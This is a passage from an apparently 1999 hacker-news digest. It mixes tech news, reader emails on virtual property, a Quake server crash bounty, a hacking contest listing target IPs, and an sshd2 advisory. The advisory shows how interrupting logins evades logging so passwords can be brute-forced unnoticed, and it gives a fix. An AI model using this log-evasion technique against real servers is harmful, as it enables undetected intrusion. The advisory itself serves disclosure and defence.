elected--by many representatives in the Net community, including regular online users.

Some veteran Netizens view the shift as necessary, but potentially problematic.

"
One of the advantages of [the Internet Assigned Numbers Authority]--and one of its
disadvantages--is that it rested with a single individual, and a single individual could
easily make a decision," said Bill Manning, a staffer with the University of Southern
California's Information Sciences Institute, which housed the Internet Assigned Numbers
Authority and also was headed by Postel. "
That nimbleness in being able to respond seems
to be a necessary casualty in making [the] transition" to a privatized Internet.

In keeping with its mission to turn over Net governance to the private sector, ICANN has
proposed a model that establishes an address supporting organization (ASO), containing
stakeholders who will forge new policies concerning IP numbering.

At its Berlin meeting May 26, ICANN will vote on proposed bylaws for supporting organizations,
including the ASO. The bylaws will set up an open membership consisting of IP address registries,
ISPs, and end users. For a new policy to be enacted a majority of each membership category must
approve it.

Election of the new organization comes at a critical juncture in the evolution of the Net's address
system, experts say, and is almost certain to stoke the public scrutiny surrounding ICANN.

"
It's important that [the ASO] understand the technical issues involved and are not swayed by the
political expediencies that have been pressed in the past," said David Conrad, founder of the Asia
Pacific Network Information Center (APNIC), one of the three IP address registries.

This sentiment is echoed by ISPs, another faction whose input will be vital to the ASO.

"
How this policy recommendation body is formed within ICANN is a concern," said Barbara Dooley,
president of ISP trade group the Commercial Internet Exchange.

Numbers don't add up
Not surprisingly, today's system is a far cry from the way things were done in the early days of the
Net.

Thirty years ago few architects of what was then called the Arpanet expected it to mushroom into a
medium that would change the way people live, work, and do business. IP addresses were viewed as an
endless resource that was free for the taking. Out of that thinking came the practice of doling out
wastefully large blocks of numbers to companies or groups that asked for them.

Ford Motor, Eli Lilly, and Hewlett-Packard are just three of the holders of the largest "
legacy"
blocks, known as Class A allocations, which contain more than 16.7 million addresses each. In 1995,
leading cable Net access provider @Home appealed to the Internet Assigned Numbers Authority after its
application for a Class A allocation was turned down. @Home ended up getting numerous smaller Class B
allocations, creating some controversy among local registries.

The legacy space doled out to those that had the foresight to ask for it is the source of jealousy for
many latecomers. They point out that while Mercedes Benz holds nearly 17 million addresses, only 1.04
million have been allocated to the entire nation of China.

"
There are a number of different business issues we foresee in the future that will require IP
addressing," said Bill Hurley, manager of new media and relationship marketing for Mercedes Benz.
"
We are looking to have an IP address for every car."

ICANN no doubt will be pressured to tip the scales toward those who have IP envy.

"
Some people in Africa and South America want their own regional registries. Some of the ISPs want to
have a bigger role in how the allocation is done," acknowledged Commerce Department spokeswoman Becky Burr,
who is overseeing the agreement with ICANN.

"
There may be a more complicated mix of players," she added. "But it still will be a fairly straightforward
allocation system."

Despite pessimism about shortages in IP space and the politics of allocation, some legacy holders have
voluntarily surrendered their blocks for the good of the Net community, such as the Defense Department and
BBN, now owned by GTE. Stanford University also is in negotiations to return part of its huge block, according
to school and registry officials.

@HWA

37.1 And is webspace infinate?
~~~~~~~~~~~~~~~~~~~~~~~~~

Infinite Space

From http://www.slashdot.org/



Posted by JonKatz on Thursday May 13, @10:00AM EDT
from the Virtual-Property-(cont.) dept.
Physicists, gamers, Web designers and developers and engineers took up (with a vengeance) the question
of whether or not the Net and the Web was an Infinite Space, forever expansible. Most felt that while
Web Space was infinite, desirable property isn't. Also comments about crackers, cryptography, gaming, virtual property,
the future of the Net and the Web, and concerns about whether real world property laws apply online. All in all, a great
cyber gab-fest, pro and con.

E-mail poured in all weekend about Infinite Space -- whether or not space on the Net and Web is forever expansible.

This was an offshoot of columns and discussions here last week about whether new connective technologies like eBay
combined with the millions of middle-class Americans pouring onto the Web were escalating the concept of virtual
property, already a custom on some gaming sites.

On the subject of Infinite Space, I heard from physicists, academics, engineers, gamers, computer execs, developers
and designers ­ some very brainy geeks who offered smart and diverging theories.

While a majority of e-mailers thought virtual property was a big idea whose time had come, there were also skeptics
claiming this idea wasn¹t really anything new.

In one sense, they¹re right. Gamers have been trading virtual parts, symbols and characters for awhile. But the impact
of new technology is often felt when new and middle-class users mainstream it, not when pioneers invent it.

Linux isn't new either, but that doesn't mean nobody should write or talk about it. As open source reaches critical mass,

  

it becomes significant. Same with other technologies from the phone to modems to computers themselves. Hackers
were patching together BBS¹s from the earliest days of networked computing, but it wasn¹t until many more people,
from housewives to business owners started pouring online that the Net took off. As more and more people -- most
armed with credit cards and checkbooks -- continue to explore and use the Net and the Web, expect continuous and
unimaginable change. But most of you know that.

Note: Lots of people wrote asking if I was changing my column format to include more of my e-mail responses. Yes, I
am. An interactive column should, when possible, include more voices than one. Not only do I get sick of myself, but I
get especially weary of getting so much smart and thoughtful e-mail nobody but me ever sees, while the often highly
testicular public posts on Threads are visible to everybody. Many visitors, lurkers and readers confuse Threads with
reality. It is one reality, but not the only one.

People have a perfect right to flame, but as my e-mail (and every other Slashdot writer and author demonstrates daily)
smart lurkers constitute the vast, unseen majority of Slashdot readers. They also want to be seen and heard.

So here are just a few of the posts ­ pro and con -- responding to my columns about virtual property and my questions
about whether space on the Net is an Infinite Space:


Boredom is More Significant, from: Stephane Lajoie

"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?

If you abstract away things like bandwidth and hard-drive storage (which seem to grow fast enough anyway), the
answer to the first question is yes: the net is infinite. But you seem to imply that the second question is the same as the
first, which it isn't.

Crowdedness happens in a specific physical place. We can say that New York City is crowded, while Arkansas is
close to empty. If we extend this concept to the net, you can say that slashdot.org is crowded while kgjrhegh.com is
empty (the DN isn't even registered, anybody could move in there for free; not anybody could move in to
Microsoft.com though).

The same thing happens in physical space: if you abstract away things like the currently limited means of transportation,
you can come to the conclusion that living space for humans in the universe is infinite. But just like people go to
slashdot.org and not to kgjrhegh.com, you won't see people moving to Mars en masse even if affordable transportation
becomes available: there just isn't anything fun to do there. I think it is Linus Torvalds who said that in a few decades,
the primary motivation for people to do "anything" will be fear of boredom.

The limit here isn't free domain names or available land in an online game. It's the attention span of people. People buy
powerful characters in UO to get attention from other players. Once the game become dated and people start moving
to Everquest, Asheron's Call or others, these characters will loose all their value because there won't be anybody to
show them off to.

You can't open a 20 screens megaplex in Nowhere, Arkansas. You can't sell web adds at kgjrhegh.com. Hope I could
keep your attention for that long :).

PS: The Cyber-Movers example was kinda weak. I mean, it's a bunch of engineers copying files around and setting up
domain name servers. Hardly the signs of a revolution if you ask me :). Still, very interesting subject matter.

PPS: I like this format of writing series of articles instead of moving on to a new subject for each article.

Stéphane Lajoie / Ludus Design


Nanotechnology and other answers, from Rob Jellinghaus:

"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?"

This question is familiar in another domain: nanotechnology. The general form of the question is, "Given sufficient
technological development, are resources potentially inexhaustible? And if so, what happens to the economy?"

In general, it is scarcity that creates value. In a world where there are infinite amounts of everything, there is no reason
for everything not to be free. But when there is only so much of something, then competition arises for that scarce
resource, and suddenly you need a way to determine who needs/wants/deserves it most. Presto: economics.

Ultima Online could probably, in principle, expand their cyberverse to accomodate the influx of people craving land. But
it's not clear that they should. The scarcity of land there is greatly increasing the value of each individual property,
perhaps intensifying the fervor of their citizens, and certainly buying them advertising that they couldn't buy with their
own money (your article being a great example). In other words, by keeping their virtual real estate scarce, they are
more effectively competing for the attention of the world's gamers, by making it clear just how valuable that real estate
is.

In fact, UO (Ultima Online)perfectly exemplifies the two resources that are _not_infinite, and will never be: Human
attention, as all domain name squatters know, is finite. There are only so many eyeballs, and only so many hours in a
day that those eyeballs can be looking at your little corner of the cyberverse. UO is competing with Everquest (which is
coming up fast). Catchy domain names ("slashdot.org") for instance, will always be more valuable than clunky ones
("www.mybiglongcompanyname.net").

- Computing and, especially, network resources are getting exponentially cheaper, but as exponentially more people go
online, it remains fairly costly to serve large audiences. UO definitely incurs ongoing costs in hardware, network
maintenance, and operations management, to keep its servers running; if they were to expand their universe infinitely,
their costs would also expand infinitely. Later.

Anyway, thanks for the thought-provoking questions,

Liberating the Lurkers, from Dana Ryder, IMMSystems:

"Congrats on the new format, if that¹s what it is. You are liberating the Lurkers! Posting comments like you are is the
only way some of us can get our ideas out and hear the good ideas of others. The rule on Slashdot Threads seems to be
that the dumber one is, the quicker you are to claim you¹re smarter than everybody else, or that you already knew
everything everybody else is saying. I can¹t fault anybody for being stupid, but boy, are these people proud of it!
Slashdot¹s columns on Virtual Property were talked about all day at my company ­ keep ?em coming!"


Of Course Not, from: Randall L Joiner:

"To your question about Infinite Space

There are several answers: Of course not, physical (hardware) resources are limited by definition, and thus, eventually
will run out. Within reason, yes, it's infinite, as tech grows, space keeps getting cheaper, there will always be room of
some sort.

The question really is, is valuable web property infinite? Many people have already answered that, and from the skim I
did, most seem to think no. I have to disagree to an extent. Since games and sites only seem to hold interest for short
time periods (game attention spans often measure in hours of game play), and people are constantly searching for the
next game, I would guess that the interest of the gamers will constantly be going through these stages:

1. New game hits, is relatively unknown.

2. Some gamers become regulars, game grows to a small number of players.

3. Game catches on in the main stream, many people start playing.

4. The original players start tiring of it, (for various reasons) and sell out.

5. Older players go back to stage 1 with some other new game. I think we'll start seeing stage 5 in about 6 months to a
year with Ultima. I give Diablo as an example... Few still play it, because everyone's jumped to Ultima. The new
up-and coming is EverQuest. It's part of the game cycle, only now we have the middle-class coming in throwing money
around. I want to know what's going to happen when the mass evac happens for the next great game, and the fools are
stuck with character's they've spent loads of $ on, and are now not worth anything, and no one is around to play the
game with? Even the "rich" couldn't keep up for to long, constantly buying new characters for each new game.

Another problem I don't think you've thought of... What happens if there's a network down time? What happens
if/when a hard-drive crashes and wipes out any record of you having owned the property?

If I were the company running the hardware those games are running on, I'd make damn sure I had a clause stating
they aren't responsible for lost characters/property/etc...

Another problem. What happens when (not _if_) someone hacks a game and suddenly goes nuts with it? How about
Virtual Theft? If I cracked the game, steal your house that you just paid 100,000 for, what recourse do you have? Then
there's the difficulty with calling it property... We have a bung-hole load of property laws in the states, but do any of
them apply to cyberspace? How about in a game where killing and taking property is a legal action? If I kill your
character and taken the property you just bought, do you have any legal recourse in RL? No, I really don't consider that
a silly problem either, as I've read some of the things people have gone to court over (and won!) that are much much
more silly. Altogether, I'm just completely amused by the concept, and consider this just one more proof that most
people really don't understand what the world or the net is really about."


Please! Absolutely Nothing New Here, from: thom stuart (painfully):

Much as it pains me every single time I realize it, I'm afraid that I have to report that once again you're picking value
out of vapor and getting all excited about something that, as always, isn't exciting or new at all.

I'm tempted to launch into an extensive diatribe, but i've got work to do today. Suffice it to say that the "virtual property"
that's got you so frantic in the last couple days is nothing more than a sale of service.

It's amazing that you're managing to misunderstand this to the extent where you think there's something new. Every
month i buy a package of 'minutes' for my mobile phone from my wireless company. These are just numbers in a
computer, of course - am I purchasing "virtual property" here? And, if i am, haven't people been doing that for years?

I could subscribe to a paying-members-only web site; I could choose to pay for HBO; I could buy an Ultima Online
account or good domain name from ebay. These are all the same thing - I'm buying the right to use a service. Just
because I¹m not getting a physical product in return doesn't make it magic or 'cyber' or anything else you might want to
think.

Okay, the UO accounts and domain names might have certain 'added value' in terms of the time/effort invested in
bringing them to their current status, but that doesn't make it any different. by buying an account or a domain, the
purchaser is simply entitled to access to certain kinds of service in return for their cold hard cash - but hey, who pays in
"physical cash" these days, anyway?

Ooh! ooh! virtual property paid for with "virtual money"! another monumental technological discovery from jon katz!
better write another /.column about this! please.


Crackers, Gaming and Infinite Space (anonymous):

Here's a copy of the comment I just posted... thought you might like it...BTW great set of articles, and I find your style
to finally have settled out into something that doesn't seem megalomaniacal and much more suited to the world you've
stepped into.. I've liked about 75% of your articles, those I didn't like were some of the earlier ones:

It's bad enough that hackers are being berated by main stream media for supposedly "stealing" from large, anonymous
corporations, can we all see what will happen when the middle class has a vested interest in computer security?

What were to happen if a cracker got onto one of the Ultima online servers, helped himself to some UO Cash and then
bought himself whatever he needs? Worse yet: Cracker gets onto the server, figures out some of it's data structure, and
decides to get into another player's building and cleans him out?

Crackers/malitious hackers finally have something that has value to steal and they would be stealing from mainstream
america instead of the corps.

This can have several consequences as I see it:

First and formost: The biggest hacker backlash in history. You think the Kevin Mitnick case was bad... now the law
enforcement officials no longer have to work on the "estimated losses" reported by companies when they get
documents copied off their servers (say source code), they have real world price tags on what the damages were.

Moreover, can we really trust mainstream american media to see the difference between hackers and crackers? It's
bad enough that they can't do it now when the crackers are just defacing websites.

Secondly: With a bit of luck, this will drive all aspects of computer security forward. I can see dedicated players paying
godo dollars for crypto systems that would protect their online assets. As well, Internationalization of crypto technology
will be given a big boost as non-North american players will want access to the same quality of crypto as we are
privileged to have.

Thirdly: Goverment regulation will quickly be pushed onto the scene. Any location generating real US$ seems to
become the target of the US house and senate.

Third, B: TAXATION! As is, it's very difficult to keep the internet taxes at bay.

In the states, the problem seems to stem from the separation of states.. but if people start shelling out cash for virtual
property, the likes of which cannot be seen right now, there will be a renewed effort by the USG to tax online
transactions.

Fourth: Hopefully this will lead to the apparition of "free" servers that will pop up and have much more room to grow,
allowing people to settle in. It'd be even nicer if a "Homesteading" act were to be implemented on UO (specific
example) to move over onto the new systems, giving them some sort of bonuses (very much like the development of the
"Wild West in early America.)

From Craig Wright: Interesting, But Shame On You!

Virtual Property is an interesting issue but really is nothing new. Buying "space" from a isp for a large website has been
around for years, paying someone else to build the website is comonplace, digitizing a photograph, and how about
DOMAIN NAMES? - these are all forms of virtual property. Middle class americans have been paying cash for
ownership of virtual materials for some time now.

Focusing on some geeks who spend too much on UO characters on ebay and then implying from that fact the economy
is undergoing a fundamental change is really quite silly. Put your technophile cheerleader pom poms down and do a little
research willyah?

Within the online gaming comunity there are other useful examples of virtual property such as Chron-X, Sanctum and
other budding online games working on a far different paradigm than the "service" model of the "pay-as-you-play"
games such as UO. C-X and Sanctum are wholly or partially based around the collectable card game paradigm
introduced years ago by MAGIC: THE GATHERING.

The interesting thing about the online versions (which have been around for at least three years or so) is that they are
ENTIRELY virtual property.

Unlike UO-type games where you have to buy the software and pay an ongoing service fee to keep playing. In these
other games the only thing that one pays for is the virtual cards (software free, no fees except paying for more cards
should you want them). As one might expect, trading, auctioning, and selling collections has been an integral part in the
development of these games. I believe C-X at one time had over 70k accounts and may have plenty more now that
they have moved to a Sony gaming site (I haven't played for nearly a year).

As a matter of fact Genetic Anomalies, the company behind Chron-X, began as a company devising a method for
protecting virtual property and developed with what they call Collectible Bits (back in 1996 I believe) and designed their
the game primarily as a way to illustrate what their software product could do in terms of reducing stealing and hacking
problems already the cause of so many problems in various online gaming communities. UO tangent: it is neither the
first, best nor probably even the largest of its genre. The 150k players - that's BS, online games inflate their players by
counting ACCOUNTS rather than active players, many players play for a while and then either reduce their playing
time significantly or stop playing altogether - but their ACCOUNTS are still counted. This is especially problematic with
UO as there are a half dozen or so games all currently in stiff competition for the same audience.

By the way, UO is the only one of its genre in which its participants have attempted to bring a class action suit against
the company because of their dissatisfaction with the game. The whole genre is unlikely to become a dominant faction
within the online gaming community merely because it is so damn expensive to play. There have been dozens of
experiments for specific subscription games or subscription gaming sites of several varieties and none have achieved
more than moderate success.

I read a few of the /. comments on your first piece and ran across thoughful responses that disagreed with you which
also made interesting points -- yet in your article you quote a few imbicilic flames as representative of those who
disagree and more thoughtful responses of those who agree. This is a rather cheap way to make your argument appear
stronger - shame on you! (Note: I only quote from e-mail, since thoughtful (and non-thoughtful) disagreements are
posted openly on Threads. And I didn¹t get many disagreements last week. I always reflect an accurate balance of
criticism versus agreement ­ discussions where everybody agrees are sort of pointless, and, on the Net, impossible. As
for nasty flames, they never bother me a bit ­ kind of like mosquitoes or peas off a tank. Knowledgeable or thoughtful
criticism, on the other hand, terrifies me).

@HWA


38.0 Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sony's robotic dog: cute, but not cuddly
By Stephanie Miles
Staff Writer, CNET News.com
May 11, 1999, 1:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,36375,00.html

update Could Sony's new Aibo be a robotic--and canine--version of a Trojan horse, this time used to smuggle
the electronic giant's new technology into homes around the world?

Probably not, analysts say, but Aibo will bring robotics into the home, along with other new Sony technologies.

Announced today, Aibo is an electronic pet capable of acting in response to external stimuli and communicating
with its owner. Intended for entertainment purposes only, the introduction of the robotic dog contains shades
of the company's previous entertainment product, the PlayStation. Once introduced as a pure gaming platform,
the PlayStation now includes computing components such as DVD drives and Internet access.

The introduction of the electronic pet is probably not a subversive method of ingratiating Sony technology
into the American home, especially because Aibo is only projected to sell 2,000 units in the United States next
year, according to Sean Kaldor, an analyst with International Data Corporation.

"I don't think this is their vehicle to propagate technologies into the mass user scale," Kaldor said, noting
that Aibo can only perform very limited functions and can't even fetch yet. Plus, he noted, the toy is priced
around $2,000, which will probably discourage mainstream acceptance. "This isn't a stealth way to mass-introduce
a product."

But Aibo may be some Americans' first opportunity to play with Sony's Memory Stick, a portable, re-recordable
storage media 1.5 inches long with the thickness of a piece of gum. Sony is selling an 8MB Memory Stick accessory
that can store commands for Aibo.

Aibo is also one of the first devices shipping running on Sony's Aperios real-time embedded operating system.
Sony struck a deal with General Instrument last year, licensing the operating system for use in GI's set-top boxes.

"There's a lot of operating systems out there, and this is Sony's proprietary operating system," explained Seamus
McAteer, an analyst with Jupiter Communications, expressing doubts that Sony is attempting any significant attempt
at marketing or promoting Aperios through Aibo.

"You're not going to have a ton of developers developing a lot of applications to run on this device, so it doesn't
buy you a whole lot," he said. "Whoever's going to buy this really doesn't care which real-time OS it is using.
It's a design win, but not a big deal."

Americans are not likely to shell out $2,000 for a programmable dog that does not yet fetch, but Aibo is likely to
succeed in the Japanese market, which wholeheartedly
embraced the Tamagotchi electronic toys, Kaldor said.

"The Japanese perspective on technology is warm and fuzzy," he said. "Robots in Japan are seen as very compelling
things, unlike in the U.S., where they seem cold and harsh."

@HWA

39.0 IBM Breaks more records for higher density storage in hard disk units
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wednesday May 12 4:02 AM ET

IBM Researchers Claim New Data Storage Record

SAN JOSE, Calif. (Reuters) - International Business Machines Corp. (NYSE:IBM - news) said it plans to announce
Wednesday that its researchers have set a new world record for high density data storage.

The company said it has doubled its old record by packing data so tight that 20.3 billion bits can fit in a
square inch of data storage -- pushing up against what many analysts believe to be the physical limits of such
technology.

At the new level of density, every square inch of disk space could hold 2.5 billion bytes -- equivalent to two
TV-quality movies or the text of some 2,500 average-sized novels. Eight bits equal a byte. A byte can store about
one character of text.

The new disk drives are 3.5 times more dense than IBM's highest capacity product, a disk drive for portable
computers capable of storing nearly 6 billion bits per inch of data.

The new developments have been demonstrated only in IBM's research labs, the company noted.

It could take two to three years before IBM is ready to incorporate the technology into commercial products from
IBM, or in disk drives that IBM's technology manufacturing unit increasingly builds for other computer makers, it
said.

``This laboratory demonstration is very good news for our customers and the data storage industry,'' said Robert
Scranton, director of recording head technology at IBM's Almaden Research Center.

``It shows that disk-drive capacities will continue to increase well into the 21st Century,'' he said.

The greater storage capacity could be used to boost the capabilities of portable electronics that use IBM's tiny
1-inch microdrive data storage disks or laptops using its 2.5-inch drives, the company said.

The extra capacity can be used to store recorded music or data-intensive graphics or video that would be impractical
using current technology.

In addition, large corporations could use such ultra-high-capacity drives to store far more data in storage systems
using the same floor space.

``The stability of the bits was especially encouraging,'' Scranton added, referring to possible fluctuations in
storage media used in such systems when pushed to such extremes.

``To make smaller bits, we improve both the disk materials and the read-write components to ensure that the bits'
magnetic orientations will not change by themselves, yet the user can still quickly and reliably erase and rewrite
bits,'' he said.

IBM, which is headquartered in Armonk, N.Y., invented computer hard disk technology in the 1950s and continues to
be a leader in advancing the storage capacity of computers.

The first technical details of the new storage system will be disclosed next week at the International Magnetics
Conference (Intermag 99) in Kyongju, Korea.

@HWA

40.0 Carmack offers a bounty on Quake server DoS's and bug reports
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

F I N G E R



This finger is being tracked and served by The Stomping Grounds' Finger Tracker. If you are looking for more fingers, please visit Stomped or go
directly to the Stomped Finger Tracker.

[idsoftware.com]

Name: John Carmack
Email: johnc@idsoftware.com
Description: Programmer
Project: Quake 3 Arena
-------------------------------------------------------------------------------

5/11/99
-------
You can bias the level of detail lower than allowed in the
menu with "r_lodbias 2", which will force all models to the lowest
lod. The view weapon will look very ugly.

Another little speedup option that isn't offered in the menus is:
"cg_simpleitems 1" this removes the extra rings and spheres around
some items.

You can also turn off all the gibs with "cg_gibs 0".


* clear game memory at init, which fixes the stuck-at-intermission
problem on mac servers
* fixed mismatched free / Z_Free in demo menu
* removed unused reference to sprites/plama.md3
* automatically get sounds from model name
* scale sensitivity by zoom
* immediately archive changes to latched cvars
* cheat protect r_portalonly
* don't print "XXX connected" on level restarts
* fixed "give item" on levels where 0,0,0 is in solid
* fixed timedemo
* don't play pain falling sound if dead
* fixed falling damage sound not snd specific
* fixed crashtest 2
* fixed crashtest 1
* q3map_backshader
* q3map_globaltexture


5/11/99
-------
Do NOT send bug reports and game comments directly to me!
If I have to filter through hundreds of emails a day, I won't get any
more work done... Only crashtest related problems should come to me,
everything else should go to q3feedback@idsoftware.com.


5/11/99
-------
Sami Tammilehto wins the second prize. Some large connectionless packets
can cause crashes.

This one was a result of me having the maximum token size defined lower
than the maximum string size.


5/11/99
-------
BigImp wins the first prize. It doesn't crash the server, but fmtspec
names will crash all clients that try to log on. Technically that would
be an upkeep required DOS attack, but I'll let this one go.

I even had a "FIXME: make vsprintf safe" comment by the offending line...

I am going to update the server to filter out all % chars that come in
over the net to prevent any other similar things.



5/11/99
-------
Everyone should realize that many popular net links are going to be clogged
up with q3test downloads for a while, so net play may be a bit patchy to
a lot of servers.

-------------

Now that the first win32 test is out, here is The Plan for going forward:

All future releases should be same-day for all architectures.

There may be an exe-only update to the current distributions if there are
significant problems, but it isn't scheduled.

The next major test release will include a new one on one map designed for
tournement play, and new executables with server and game modifications, but
will not require downloading a new pak0.pk3.

The release after that will introduce various teamplay rules on the original
two maps. This version will likely be another full download, because I
know that I still have a couple things to change in the map format. This
will probably be the first test running with the virtual machine.

The final major test release will introduce the single player game with
bots and ranks.

After any bugs are shaken out of that, it will be the "Q3 Demo" instead of
the "Q3 Test", and we should be ready to release the full game to stores.

In an ideal world, people that aren't prepared to deal with in-development
software would wait until then to form an opinion of the product.

---------------

***** I am offering a bounty for server crashing bugs. Q2 had several releases
forced out because of malicious attacks on all the public servers, so I
want to try and flush out what I can during Q3's testing phase.

There is a server running in the debugger here at crashtest.idsoftware.com
(192.246.40.68). Anyone that can repeatably hang or crash this system can
have a $100 prize and some misc bit of Q3A paraphenalia that I can dig up.

Operating system level attacks don't count -- only things that I can actually
fix or protect against in my code.

Denial of service attacks don't count if they require upkeep, but if there is
a fire-and-forget DOS attack, it will still count.

Any actions you can perform with the released client are fair game. Crashing
the client isn't good for a bounty, but I would still like to know about it.

Custom attack programs are also fair game. These are actually what I am most
concerned about -- malicious programs that goes through and crash all listed
servers.

Ideally, you would practice on a private server under your control and only
hit crashtest when you think you can repeat it.

If you find one, email me the instructions so I can reproduce it. Include
"CRASHTEST" in the subject so I won't miss it.

First come, first served, one bounty per bug. I will update crashtest with
our internal builds, so it will certainly be possible that an attack on the
released servers no longer functions on crashtest.




All Content Copyright 1999 by Reliant Net Services
Formatted for 800x600 Resolution in High Color
Designed for Version 4.0 Browsers or Better

T3 Bandwidth Provided by: Spacestar Communications


@HWA

41.0 Hack into a webserver and win $10,000 ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Break Into a Web Server win $10,000


contributed by szone
You can win a measly $10,000 for penetration into web severs during tomorrows Hackers Zone competition
organized in conjunction with Infosecurity Asia. This 'competition' of course is nothing more than an
exploitation by the sponsors Conclave and Voltaire whose products will be 'tested'. The IP addresses of the
boxes in question are 210.24.153.90 and 210.24.153.70.You need not be present to win. (I don't know about
you but I have better things to do with my time than e advertising fodder for these companies. If they want
a real world security assessment of their products let them pay for one.)

Internet Wire
http://www.internetwire.com/technews/tn/tn982682.htx

Tech Web
http://www.techweb.com/printableArticle?doc_id=TWB19990512S0029

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html

Nando Times
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html


Asian Conference Hosts Hacking Contest
By Malcolm Maclachlan, TechWeb
May 12, 1999 (4:28 PM)
URL: http://www.techweb.com/wire/story/TWB19990512S0029

A conference in Singapore is working to show the dangers of hacking, ironically, by holding a hacking contest with thousands of dollars in prizes. The international
Hackers Zone competition, which started Wednesday, is offering $10,000 to the first person to successfully break into servers connected to the Web and running
security products. One server is running security products from Voltaire Advanced Data Security, while the second server is running software from Conclave Integrated
Security.

Hosted by Infosecurity Asia '99, the computer-security conference that will be held in Singapore next month, is open to anyone in the world. In order to prove the
success, hackers have to move a file onto the server, or modify the Web page hosted there, and then send an e-mail describing their action to an address set up at
Yahoo. The conference has promised to keep the names of all contestants confidential.

The sponsors of the contest sought to point out that they did not endorse hacking, the general term for breaking into computer networks. Some computer enthusiast
prefer the term "cracker," using the term hacker instead to refer to any hard-core programmer.

"We consider hacking a criminal offense prosecutable in many countries and we do not condone such actions," said George Kane, regional director of Conclave, in a
statement.

Dan Farmer, a well-known computer-security expert, said such contests are not what they're cracked up to be.

"Organizations do this from time to time -- it's not unusual," Farmer said. "I view them as misguided and modestly dangerous publicity stunts."

There are a number of problems with such contests, he said. For one thing, the computer set-ups rarely mimic the way a network would be forced to work in the real
world. Thus, he said, some companies use such contest to tout the invincibility of their systems and say how they foiled the world's best crackers, even though the
world's best hackers probably would not get involved in something like this.

Companies also get free testing of their systems. For instance, they can get "attack signatures," digital fingerprints that show how people attack a certain system. These
can be used later to help companies realize when they are being attacked in the future. Such signatures are hard to get in the real world. Furthermore, such security
testing can be quite expensive.

"10K is chump change in the corporate world," Farmer said.

Farmer is the author of Security Administrator's Tool for Analyzing Networks, a Unix tool that systems administrators use to test for security breaches in networks. The
program, known as SATAN, caused a stir when it came out in 1995, prompting Farmer to publish multiple documents through his website explaining the rationale behind
the software. The difference, Farmer said, is that contests encourage a certain type of behavior.

"They're sending a message that breaking into systems is OK, that they'll reward the best and brightest," Farmer said.

@HWA


42.0 SSHD vulnerability discovered by JJF Hackers Team
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

SSH Hole


contributed by Zhodiac
The J.J.F. Hackers team has released a advisory that
covers problems in SSHD2 (up to version 2.0.11). The
vulnerability describes a way to brute force a
login/password.

J.J.F. Hackers Team
http://www.jjf.org/advisory/SshdJJFen.txt



- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 05/09/1999
Release: 05/14/1999
Author: Zhodiac <zhodiac@jjf.org>
URL: http://www.jjf.org
Application: sshd2 up to 2.0.11
OS: Unix
Risk: Risky :), long term could gain system access.

-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=

In the default instalation of sshd2 (up to 2.0.11) there is an
open way to bruteforce a login/password, without any kind of ip logging
by the sshd. Version 2.0.12 and newers seems to be not vulnerable to
this attack, because it logs the ip at connection time.

-=-=-=-=-=-=-=-=
Details
-=-=-=-=-=-=-=-=

When a ssh client connects to the daemon, it has a number
(default is three) of attempts to guess the correct password before
disconnecting. If we shutdown the connection before using up the number
of attempts, the daemon will not log neither the connection, the
password guesses nor the ip of the client.

One cristal clear example:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:

Disconnected; authentication error.
[zhodiac@piscis zhodiac]$

In /var/log/messages:

May 9 12:42:53 piscis sshd2[1391]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1344', requested service 'ssh-connection')'

Now we try the bug:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password: FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$

Those "FATAL: Received signal2." are the response of
interrupting the program with a ^C.

Lets see what syslog did:

May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection
closed.
May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection
closed.
May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection
closed.

No ip, no password guesses attempts on the logs!
So a bruteforce can be done without any kind of logging... Sorry
script-kiddies, no program available!

-=-=-=-=-=-=-=-=
Quick Fix
-=-=-=-=-=-=-=-=

Edit the file sshd2_config (usually at /etc/ssh2), set the value
of "PasswordGuesses" to 1. With this each time a password is tried it
will log it in the following way:

May 9 12:46:07 piscis sshd[1308]: User authentication failed:
'Authentication method disabled. (user 'zhodiac', client address
'192.168.1.1:1527', requested service 'ssh-connection')'

It is also recommended to set the value of "ListenAddress" so we
will have more control of which ips can use our ssh service.

A better solution is to upgrade to 2.0.12 version or newer , with
them at connection it will log via syslog in the following way:

May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
zhodiac@jjf.org

http://www.jjf.org
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

@HWA

43.0 Neil Stephenson's new book "Cryptonomicon"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


